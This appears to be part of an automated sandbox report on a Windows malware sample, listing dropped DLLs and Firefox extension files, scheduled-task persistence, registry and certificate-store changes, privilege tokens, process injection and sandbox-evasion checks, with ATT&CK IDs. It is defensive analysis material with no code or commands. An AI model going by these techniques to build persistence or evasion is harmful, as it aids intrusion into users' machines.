File created	C:\Program Files (x86)\nWWVEJXizSHU2\ylcyQdXUntaCh.dll	EewdQlg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	IxRRkPx.exe
File created	C:\Program Files (x86)\RNplELueU\lydUtC.dll	EewdQlg.exe
File created	C:\Program Files (x86)\RNplELueU\TXrIinT.xml	EewdQlg.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	IxRRkPx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	IxRRkPx.exe
File created	C:\Program Files (x86)\rUfZlqUIdWiU2\dxhmrSW.xml	IxRRkPx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	EewdQlg.exe
File created	C:\Program Files (x86)\NNMAoTKMcAkAC\IvJZMOG.xml	IxRRkPx.exe
File created	C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\bSpqJTv.dll	EewdQlg.exe
File created	C:\Program Files (x86)\nWWVEJXizSHU2\ykqnqpK.xml	EewdQlg.exe
File created	C:\Program Files (x86)\fLdzueVMGzfAC\JosforS.xml	EewdQlg.exe
File created	C:\Program Files (x86)\rUfZlqUIdWiU2\mlNzekDRvYHXr.dll	IxRRkPx.exe
File created	C:\Program Files (x86)\MIUMVdEgyTUn\NDxqtvZ.dll	IxRRkPx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	EewdQlg.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	EewdQlg.exe
File created	C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\MDsNVre.xml	EewdQlg.exe
File created	C:\Program Files (x86)\fLdzueVMGzfAC\mexVqpC.dll	EewdQlg.exe
File created	C:\Program Files (x86)\ushFnVEJKMUn\eCBquSb.dll	EewdQlg.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	EewdQlg.exe
File created	C:\Program Files (x86)\bBBSFQQZU\grVJhVg.xml	IxRRkPx.exe
File created	C:\Program Files (x86)\rPikKiIbwrQGukIChiR\iOzhcon.xml	IxRRkPx.exe
File created	C:\Program Files (x86)\bBBSFQQZU\lzkRYX.dll	IxRRkPx.exe
File created	C:\Program Files (x86)\rPikKiIbwrQGukIChiR\IdUQzlx.dll	IxRRkPx.exe
File created	C:\Program Files (x86)\NNMAoTKMcAkAC\cUpXzvZ.dll	IxRRkPx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	EewdQlg.exe

Drops file in Windows directory 8 IoCs

Processes:

schtasks.exeIDAAFBGDBK.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bBfKaGDnIKdTdJZScE.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	IDAAFBGDBK.exe
File created	C:\Windows\Tasks\QVuDljbAZykxnpoWI.job	schtasks.exe
File created	C:\Windows\Tasks\wgFtIVrBuHdIdLf.job	schtasks.exe
File created	C:\Windows\Tasks\MhsnVFKWmmyXGZkTD.job	schtasks.exe
File created	C:\Windows\Tasks\vczjtXgpVbXDKOBgh.job	schtasks.exe
File created	C:\Windows\Tasks\LVynAQLCTpGcVPg.job	schtasks.exe
File created	C:\Windows\Tasks\bUVDAOPnPkUhchiViu.job	schtasks.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2340 sc.exe
4400 sc.exe
1648 sc.exe
4572 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2340	sc.exe
4400	sc.exe
1648	sc.exe
4572	sc.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2280	4896	WerFault.exe	CAFBGHIDBG.exe
4636	1268	WerFault.exe	HIDHDAAEHI.exe
3036	456	WerFault.exe	wFKORKUUomDpdfJYw8c2.exe
636	652	WerFault.exe	rxYWvuYz0iK83W5tIP0y.exe
736	1960	WerFault.exe	QodMliwi0wNIw5fk4qWX.exe
4980	4444	WerFault.exe	FCFBAKJDBK.exe
1064	968	WerFault.exe	ZuSySbAJBbxTdwKngmmZ.exe
4116	3208	WerFault.exe	Install.exe
3400	3688	WerFault.exe	Install.exe
8	4672	WerFault.exe	Install.exe
3996	3656	WerFault.exe	EewdQlg.exe
3212	2012	WerFault.exe	Install.exe
1748	4864	WerFault.exe	IxRRkPx.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exeRegAsm.exeS8foXdS7HYSMtBrHz1ZrPeP5.exeMSBuild.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	S8foXdS7HYSMtBrHz1ZrPeP5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	S8foXdS7HYSMtBrHz1ZrPeP5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3940 timeout.exe

pid	process
3940	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeInstall.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exeIxRRkPx.exeEewdQlg.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	IxRRkPx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	IxRRkPx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	EewdQlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8ccc3c3f-0000-0000-0000-d01200000000}\MaxCapacity = "14116"	EewdQlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	EewdQlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	EewdQlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	IxRRkPx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 29 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1560	schtasks.exe
3916	schtasks.exe
440	schtasks.exe
4400	schtasks.exe
3508	schtasks.exe
1160	schtasks.exe
3160	schtasks.exe
4116	schtasks.exe
624	schtasks.exe
1648	schtasks.exe
1652	schtasks.exe
3220	schtasks.exe
1300	schtasks.exe
3108	schtasks.exe
2692	schtasks.exe
1376	schtasks.exe
1716	schtasks.exe
1648	schtasks.exe
1116	schtasks.exe
2736	schtasks.exe
4904	schtasks.exe
4608	schtasks.exe
3756	schtasks.exe
3468	schtasks.exe
4984	schtasks.exe
4252	schtasks.exe
3100	schtasks.exe
4972	schtasks.exe
956	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exeSWKM3BZCcIHViuMlWB_ItJtR.exemibSk5BFjCa4UGEw0tal2yQC.exeS8foXdS7HYSMtBrHz1ZrPeP5.exePuMRANaFeo3cGudQytaFcnzh.exepokafdw.exepowershell.exepowershell.exeMSBuild.exeMSBuild.exeMSBuild.exeIDAAFBGDBK.exeexplorti.exeeqtpkqwqodik.exeRegAsm.exeRegAsm.exeexplorti.exe

pid	process
2972	setup.exe
2972	setup.exe
1012	SWKM3BZCcIHViuMlWB_ItJtR.exe
1012	SWKM3BZCcIHViuMlWB_ItJtR.exe
5020	mibSk5BFjCa4UGEw0tal2yQC.exe
5020	mibSk5BFjCa4UGEw0tal2yQC.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
3656	pokafdw.exe
3656	pokafdw.exe
3484	powershell.exe
3484	powershell.exe
2076	powershell.exe
2076	powershell.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
2076	powershell.exe
3484	powershell.exe
2512	MSBuild.exe
2512	MSBuild.exe
1820	MSBuild.exe
1820	MSBuild.exe
2512	MSBuild.exe
2512	MSBuild.exe
2512	MSBuild.exe
2512	MSBuild.exe
3584	MSBuild.exe
3584	MSBuild.exe
2200	IDAAFBGDBK.exe
2200	IDAAFBGDBK.exe
3584	MSBuild.exe
3584	MSBuild.exe
3412	explorti.exe
3412	explorti.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
4316	eqtpkqwqodik.exe
3584	MSBuild.exe
3584	MSBuild.exe
3584	MSBuild.exe
3584	MSBuild.exe
5052	RegAsm.exe
5052	RegAsm.exe
4556	RegAsm.exe
4556	RegAsm.exe
4556	RegAsm.exe
4556	RegAsm.exe
4276	explorti.exe
4276	explorti.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

cmd.exe

pid process

2412 cmd.exe

pid	process
2412	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

3x7B5KMTGyQ8p8HaByXtiLCL.exemibSk5BFjCa4UGEw0tal2yQC.exeMSBuild.exe3VugNwJeQs8ly7yqDYO4mKWh.exepowershell.exepowershell.exeWMIC.exeWMIC.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe
Token: SeDebugPrivilege	5020	mibSk5BFjCa4UGEw0tal2yQC.exe
Token: SeDebugPrivilege	1820	MSBuild.exe
Token: SeBackupPrivilege	1820	MSBuild.exe
Token: SeSecurityPrivilege	1820	MSBuild.exe
Token: SeSecurityPrivilege	1820	MSBuild.exe
Token: SeSecurityPrivilege	1820	MSBuild.exe
Token: SeSecurityPrivilege	1820	MSBuild.exe
Token: SeDebugPrivilege	4568	3VugNwJeQs8ly7yqDYO4mKWh.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeIncreaseQuotaPrivilege	652	WMIC.exe
Token: SeSecurityPrivilege	652	WMIC.exe
Token: SeTakeOwnershipPrivilege	652	WMIC.exe
Token: SeLoadDriverPrivilege	652	WMIC.exe
Token: SeSystemProfilePrivilege	652	WMIC.exe
Token: SeSystemtimePrivilege	652	WMIC.exe
Token: SeProfSingleProcessPrivilege	652	WMIC.exe
Token: SeIncBasePriorityPrivilege	652	WMIC.exe
Token: SeCreatePagefilePrivilege	652	WMIC.exe
Token: SeBackupPrivilege	652	WMIC.exe
Token: SeRestorePrivilege	652	WMIC.exe
Token: SeShutdownPrivilege	652	WMIC.exe
Token: SeDebugPrivilege	652	WMIC.exe
Token: SeSystemEnvironmentPrivilege	652	WMIC.exe
Token: SeRemoteShutdownPrivilege	652	WMIC.exe
Token: SeUndockPrivilege	652	WMIC.exe
Token: SeManageVolumePrivilege	652	WMIC.exe
Token: 33	652	WMIC.exe
Token: 34	652	WMIC.exe
Token: 35	652	WMIC.exe
Token: 36	652	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3508	WMIC.exe
Token: SeSecurityPrivilege	3508	WMIC.exe
Token: SeTakeOwnershipPrivilege	3508	WMIC.exe
Token: SeLoadDriverPrivilege	3508	WMIC.exe
Token: SeSystemProfilePrivilege	3508	WMIC.exe
Token: SeSystemtimePrivilege	3508	WMIC.exe
Token: SeProfSingleProcessPrivilege	3508	WMIC.exe
Token: SeIncBasePriorityPrivilege	3508	WMIC.exe
Token: SeCreatePagefilePrivilege	3508	WMIC.exe
Token: SeBackupPrivilege	3508	WMIC.exe
Token: SeRestorePrivilege	3508	WMIC.exe
Token: SeShutdownPrivilege	3508	WMIC.exe
Token: SeDebugPrivilege	3508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3508	WMIC.exe
Token: SeRemoteShutdownPrivilege	3508	WMIC.exe
Token: SeUndockPrivilege	3508	WMIC.exe
Token: SeManageVolumePrivilege	3508	WMIC.exe
Token: 33	3508	WMIC.exe
Token: 34	3508	WMIC.exe
Token: 35	3508	WMIC.exe
Token: 36	3508	WMIC.exe
Token: SeDebugPrivilege	2512	MSBuild.exe
Token: SeIncreaseQuotaPrivilege	652	WMIC.exe
Token: SeSecurityPrivilege	652	WMIC.exe
Token: SeTakeOwnershipPrivilege	652	WMIC.exe
Token: SeLoadDriverPrivilege	652	WMIC.exe
Token: SeSystemProfilePrivilege	652	WMIC.exe
Token: SeSystemtimePrivilege	652	WMIC.exe
Token: SeProfSingleProcessPrivilege	652	WMIC.exe
Token: SeIncBasePriorityPrivilege	652	WMIC.exe
Token: SeCreatePagefilePrivilege	652	WMIC.exe
Token: SeBackupPrivilege	652	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

eb8oCAqj4BdwdiLJp_sYHpSG.tmp

pid process

1708 eb8oCAqj4BdwdiLJp_sYHpSG.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

S8foXdS7HYSMtBrHz1ZrPeP5.execmd.exe9eaefd5738.exe

pid process

1496 S8foXdS7HYSMtBrHz1ZrPeP5.exe
2412 cmd.exe
3628 9eaefd5738.exe

pid	process
1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp

pid	process
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
2412	cmd.exe
3628	9eaefd5738.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exeeb8oCAqj4BdwdiLJp_sYHpSG.exe6J_fcmCVLn9KieKbpsZvL30J.exe3x7B5KMTGyQ8p8HaByXtiLCL.exemibSk5BFjCa4UGEw0tal2yQC.exeeb8oCAqj4BdwdiLJp_sYHpSG.tmpNJwFp4moOVCLFNHiDa5bIGzw.exeq7psGQ3aiTk_B1mfefLThniX.exeSWKM3BZCcIHViuMlWB_ItJtR.exe

description	pid	process	target process
PID 2972 wrote to memory of 4272	2972	setup.exe	PuMRANaFeo3cGudQytaFcnzh.exe
PID 2972 wrote to memory of 4272	2972	setup.exe	PuMRANaFeo3cGudQytaFcnzh.exe
PID 2972 wrote to memory of 1496	2972	setup.exe	S8foXdS7HYSMtBrHz1ZrPeP5.exe
PID 2972 wrote to memory of 1496	2972	setup.exe	S8foXdS7HYSMtBrHz1ZrPeP5.exe
PID 2972 wrote to memory of 1496	2972	setup.exe	S8foXdS7HYSMtBrHz1ZrPeP5.exe
PID 2972 wrote to memory of 4488	2972	setup.exe	q7psGQ3aiTk_B1mfefLThniX.exe
PID 2972 wrote to memory of 4488	2972	setup.exe	q7psGQ3aiTk_B1mfefLThniX.exe
PID 2972 wrote to memory of 2336	2972	setup.exe	eb8oCAqj4BdwdiLJp_sYHpSG.exe
PID 2972 wrote to memory of 2336	2972	setup.exe	eb8oCAqj4BdwdiLJp_sYHpSG.exe
PID 2972 wrote to memory of 2336	2972	setup.exe	eb8oCAqj4BdwdiLJp_sYHpSG.exe
PID 2972 wrote to memory of 4656	2972	setup.exe	6J_fcmCVLn9KieKbpsZvL30J.exe
PID 2972 wrote to memory of 4656	2972	setup.exe	6J_fcmCVLn9KieKbpsZvL30J.exe
PID 2972 wrote to memory of 4656	2972	setup.exe	6J_fcmCVLn9KieKbpsZvL30J.exe
PID 2972 wrote to memory of 3820	2972	setup.exe	NJwFp4moOVCLFNHiDa5bIGzw.exe
PID 2972 wrote to memory of 3820	2972	setup.exe	NJwFp4moOVCLFNHiDa5bIGzw.exe
PID 2972 wrote to memory of 3820	2972	setup.exe	NJwFp4moOVCLFNHiDa5bIGzw.exe
PID 2972 wrote to memory of 2200	2972	setup.exe	3x7B5KMTGyQ8p8HaByXtiLCL.exe
PID 2972 wrote to memory of 2200	2972	setup.exe	3x7B5KMTGyQ8p8HaByXtiLCL.exe
PID 2972 wrote to memory of 2200	2972	setup.exe	3x7B5KMTGyQ8p8HaByXtiLCL.exe
PID 2972 wrote to memory of 1012	2972	setup.exe	SWKM3BZCcIHViuMlWB_ItJtR.exe
PID 2972 wrote to memory of 1012	2972	setup.exe	SWKM3BZCcIHViuMlWB_ItJtR.exe
PID 2972 wrote to memory of 1012	2972	setup.exe	SWKM3BZCcIHViuMlWB_ItJtR.exe
PID 2972 wrote to memory of 5020	2972	setup.exe	mibSk5BFjCa4UGEw0tal2yQC.exe
PID 2972 wrote to memory of 5020	2972	setup.exe	mibSk5BFjCa4UGEw0tal2yQC.exe
PID 2972 wrote to memory of 5020	2972	setup.exe	mibSk5BFjCa4UGEw0tal2yQC.exe
PID 2972 wrote to memory of 1528	2972	setup.exe	GsSlVKj1HY8eSYR0r_a6kCV6.exe
PID 2972 wrote to memory of 1528	2972	setup.exe	GsSlVKj1HY8eSYR0r_a6kCV6.exe
PID 2336 wrote to memory of 1708	2336	eb8oCAqj4BdwdiLJp_sYHpSG.exe	eb8oCAqj4BdwdiLJp_sYHpSG.tmp
PID 2336 wrote to memory of 1708	2336	eb8oCAqj4BdwdiLJp_sYHpSG.exe	eb8oCAqj4BdwdiLJp_sYHpSG.tmp
PID 2336 wrote to memory of 1708	2336	eb8oCAqj4BdwdiLJp_sYHpSG.exe	eb8oCAqj4BdwdiLJp_sYHpSG.tmp
PID 4656 wrote to memory of 4620	4656	6J_fcmCVLn9KieKbpsZvL30J.exe	Install.exe
PID 4656 wrote to memory of 4620	4656	6J_fcmCVLn9KieKbpsZvL30J.exe	Install.exe
PID 4656 wrote to memory of 4620	4656	6J_fcmCVLn9KieKbpsZvL30J.exe	Install.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 5020 wrote to memory of 3032	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 3032	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 3032	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 1708 wrote to memory of 4876	1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp	vkfreeaudiosaver32_64.exe
PID 1708 wrote to memory of 4876	1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp	vkfreeaudiosaver32_64.exe
PID 1708 wrote to memory of 4876	1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp	vkfreeaudiosaver32_64.exe
PID 3820 wrote to memory of 2088	3820	NJwFp4moOVCLFNHiDa5bIGzw.exe	Install.exe
PID 3820 wrote to memory of 2088	3820	NJwFp4moOVCLFNHiDa5bIGzw.exe	Install.exe
PID 3820 wrote to memory of 2088	3820	NJwFp4moOVCLFNHiDa5bIGzw.exe	Install.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 2200 wrote to memory of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 4488 wrote to memory of 3692	4488	q7psGQ3aiTk_B1mfefLThniX.exe	cmd.exe
PID 4488 wrote to memory of 3692	4488	q7psGQ3aiTk_B1mfefLThniX.exe	cmd.exe
